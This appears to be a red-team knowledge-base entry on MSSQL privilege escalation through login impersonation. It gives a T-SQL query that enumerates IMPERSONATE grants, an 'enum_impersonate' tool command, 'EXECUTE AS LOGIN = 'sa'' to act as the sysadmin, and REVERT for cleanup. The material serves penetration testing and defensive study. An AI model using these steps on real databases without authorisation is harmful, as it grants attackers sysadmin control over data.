Operator On The Wire
Join
← Back to Knowledge Base
RED TEAM / SQL / MSSQL / PRIVILEGE ESCALATION

Impersonation

Enumerate

SELECT name FROM sys.server_permissions JOIN sys.server_principals ON grantor_principal_id = principal_id WHERE permission_name = 'IMPERSONATE';

-- Also

enum_impersonate

Execute

EXECUTE AS LOGIN = 'sa';

Cleanup

After impersonating sa, all of our following T-SQL queries will execute under their context, until we issue the REVERT statement like so:

REVERT;